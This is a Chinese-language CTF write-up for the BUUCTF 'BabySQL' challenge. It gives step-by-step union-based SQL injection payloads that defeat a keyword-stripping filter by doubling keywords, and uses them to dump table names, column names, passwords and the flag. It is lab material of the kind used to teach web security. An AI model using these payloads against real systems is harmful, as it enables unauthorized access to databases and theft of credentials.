BUUCTF WEB [极客大挑战 2019]BabySQL
-
进入环境后尝试万能密码登录失败,尝试常规sql注入
-
check.php?username=1&password=2' union select 1,2,3;#
回显
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1,2,3;#'' at line 1
得到注入点
-
观察回显报错,发现
union select
被过滤掉了,可能是被replace()
函数替换为空字符串check.php?username=1&password=2' ununionion seselectlect 1,2,3;#
回显
Login Success! Hello 2! Your password is '3'
得到回显位置,开始注入
-
查询表名
ununionion seselectlect 1,2,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=database());# 'b4bsql,geekuser'
查询列名
ununionion seselectlect 1,2,(selselectect group_concat(column_name) frofromm infoorrmation_schema.columns whwhereere table_name='b4bsql');# 'id,username,password'
查询密码
ununionion seselectlect 1,2,(seselectlect group_concat(passwoorrd) frfromom b4bsql);# 'i_want_to_play_2077,sql_injection_is_so_fun,do_you_know_pornhub,github_is_different_from_pornhub,you_found_flag_so_stop,i_told_you_to_stop,hack_by_cl4y,flag{e5cc7e5a-dc6d-4251-963a-e641acea493e}'
-
得到flag
flag{e5cc7e5a-dc6d-4251-963a-e641acea493e}